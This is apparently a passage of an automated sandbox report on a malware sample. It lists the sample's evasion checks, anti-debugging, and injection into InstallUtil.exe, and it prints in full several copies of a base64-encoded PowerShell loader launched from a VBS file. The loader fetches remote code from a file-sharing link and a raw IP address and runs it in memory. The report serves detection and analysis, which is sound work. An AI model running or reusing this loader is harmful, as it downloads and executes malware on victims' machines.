                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: powershell.exe, 00000006.00000002.520366968.0000000007226000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.628206109.0000000002195000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.627094210.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.628206109.0000000002219000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2160000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 725Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7380Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3600Thread sleep time: -240000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3884Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3888Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3888Thread sleep time: -3000000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3888Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3848Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4020Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: InstallUtil.exe, 00000008.00000002.628206109.0000000002219000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                  Source: InstallUtil.exe, 00000008.00000002.628206109.0000000002219000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                  Source: InstallUtil.exe, 00000008.00000002.627094210.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-327
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-370
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_002E5318 CheckRemoteDebuggerPresent,8_2_002E5318
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03550707 mov edx, dword ptr fs:[00000030h]2_2_03550707
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTR
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 440000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7EFDE008Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mentallanguagefatalmemtallliz.vbs" Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $elar = 'JGZsZWltb3NvID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdW5pY2VsdWxhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNvcmNvdmFkbyA9ICR1bmljZWx1bGFyLkRvd25sb2FkRGF0YSgkZmxlaW1vc28pOyRuZXRhbWVudGUgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkY29yY292YWRvKTskYmVpamFmbG9yID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleHBsb3NpciA9ICc8PEJBU0U2NF9FTkQ+Pic7JGZhYmFnZWxsYSA9ICRuZXRhbWVudGUuSW5kZXhPZigkYmVpamFmbG9yKTskbXVuaGEgPSAkbmV0YW1lbnRlLkluZGV4T2YoJGV4cGxvc2lyKTskZmFiYWdlbGxhIC1nZSAwIC1hbmQgJG11bmhhIC1ndCAkZmFiYWdlbGxhOyRmYWJhZ2VsbGEgKz0gJGJlaWphZmxvci5MZW5ndGg7JGZvbG9zYSA9ICRtdW5oYSAtICRmYWJhZ2VsbGE7JGdlcm1pY2lkYSA9ICRuZXRhbWVudGUuU3Vic3RyaW5nKCRmYWJhZ2VsbGEsICRmb2xvc2EpOyRwZW5oYXNjb3NvID0gLWpvaW4gKCRnZXJtaWNpZGEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGdlcm1pY2lkYS5MZW5ndGgpXTskZGV0cmFjdGl2byA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHBlbmhhc2Nvc28pOyRjb3Jlb2dyYWZpYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGRldHJhY3Rpdm8pOyRib3RpbSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRib3RpbS5JbnZva2UoJG51bGwsIEAoJ3R4dC5zc3NzZ2liYW1tZS81MDEuNjguMTIxLjc4Ly86cHR0aCcsICckcGlwb2NvJywgJyRwaXBvY28nLCAnJHBpcG9jbycsICdJbnN0YWxsVXRpbCcsICckcGlwb2NvJywgJyRwaXBvY28nLCckcGlwb2NvJywnJHBpcG9jbycsJyRwaXBvY28nLCckcGlwb2NvJywnJHBpcG9jbycsJzEnLCckcGlwb2NvJykpOw==';$alteastro = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($elar));Invoke-Expression $alteastroJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $elar = 'jgzszwltb3nvid0gj2h0dhbzoi8vmtaxni5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9sfrvr19fexj1rfiwt0fasdbisep5zxbvclhtdkzfatzqogj3zvrlv0jddte5egnialfonvrrc2e0t0cwtxfjy3fxtkxszyzwa192awq9ztaxmdk2mzhjowjmyjk1nze3mzi3otqzntzhmwzmnmmgjzskdw5py2vsdwxhcia9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7jgnvcmnvdmfkbya9icr1bmljzwx1bgfylkrvd25sb2fkrgf0ysgkzmxlaw1vc28poyruzxrhbwvudgugpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygky29yy292ywrvktskymvpamfmbg9yid0gjzw8qkftrty0x1nuqvjupj4noyrlehbsb3npcia9icc8pejbu0u2nf9ftkq+pic7jgzhymfnzwxsysa9icruzxrhbwvudguusw5kzxhpzigkymvpamfmbg9yktskbxvuagegpsakbmv0yw1lbnrllkluzgv4t2yojgv4cgxvc2lyktskzmfiywdlbgxhic1nzsawic1hbmqgjg11bmhhic1ndcakzmfiywdlbgxhoyrmywjhz2vsbgegkz0gjgjlawphzmxvci5mzw5ndgg7jgzvbg9zysa9icrtdw5oysaticrmywjhz2vsbge7jgdlcm1py2lkysa9icruzxrhbwvudguuu3vic3ryaw5nkcrmywjhz2vsbgesicrmb2xvc2epoyrwzw5oyxnjb3nvid0glwpvaw4gkcrnzxjtawnpzgeuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojgdlcm1py2lkys5mzw5ndggpxtskzgv0cmfjdgl2bya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojhblbmhhc2nvc28poyrjb3jlb2dyywzpysa9ifttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06okxvywqojgrldhjhy3rpdm8poyrib3rpbsa9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrib3rpbs5jbnzva2uojg51bgwsieaoj3r4dc5zc3nzz2liyw1tzs81mdeunjgumtixljc4ly86chr0accsicckcglwb2nvjywgjyrwaxbvy28nlcanjhbpcg9jbycsicdjbnn0ywxsvxrpbccsicckcglwb2nvjywgjyrwaxbvy28nlcckcglwb2nvjywnjhbpcg9jbycsjyrwaxbvy28nlcckcglwb2nvjywnjhbpcg9jbycsjzenlcckcglwb2nvjykpow==';$alteastro = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($elar));invoke-expression $alteastro
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $elar = 'jgzszwltb3nvid0gj2h0dhbzoi8vmtaxni5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9sfrvr19fexj1rfiwt0fasdbisep5zxbvclhtdkzfatzqogj3zvrlv0jddte5egnialfonvrrc2e0t0cwtxfjy3fxtkxszyzwa192awq9ztaxmdk2mzhjowjmyjk1nze3mzi3otqzntzhmwzmnmmgjzskdw5py2vsdwxhcia9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7jgnvcmnvdmfkbya9icr1bmljzwx1bgfylkrvd25sb2fkrgf0ysgkzmxlaw1vc28poyruzxrhbwvudgugpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygky29yy292ywrvktskymvpamfmbg9yid0gjzw8qkftrty0x1nuqvjupj4noyrlehbsb3npcia9icc8pejbu0u2nf9ftkq+pic7jgzhymfnzwxsysa9icruzxrhbwvudguusw5kzxhpzigkymvpamfmbg9yktskbxvuagegpsakbmv0yw1lbnrllkluzgv4t2yojgv4cgxvc2lyktskzmfiywdlbgxhic1nzsawic1hbmqgjg11bmhhic1ndcakzmfiywdlbgxhoyrmywjhz2vsbgegkz0gjgjlawphzmxvci5mzw5ndgg7jgzvbg9zysa9icrtdw5oysaticrmywjhz2vsbge7jgdlcm1py2lkysa9icruzxrhbwvudguuu3vic3ryaw5nkcrmywjhz2vsbgesicrmb2xvc2epoyrwzw5oyxnjb3nvid0glwpvaw4gkcrnzxjtawnpzgeuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojgdlcm1py2lkys5mzw5ndggpxtskzgv0cmfjdgl2bya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojhblbmhhc2nvc28poyrjb3jlb2dyywzpysa9ifttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06okxvywqojgrldhjhy3rpdm8poyrib3rpbsa9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrib3rpbs5jbnzva2uojg51bgwsieaoj3r4dc5zc3nzz2liyw1tzs81mdeunjgumtixljc4ly86chr0accsicckcglwb2nvjywgjyrwaxbvy28nlcanjhbpcg9jbycsicdjbnn0ywxsvxrpbccsicckcglwb2nvjywgjyrwaxbvy28nlcckcglwb2nvjywnjhbpcg9jbycsjyrwaxbvy28nlcckcglwb2nvjywnjhbpcg9jbycsjzenlcckcglwb2nvjykpow==';$alteastro = 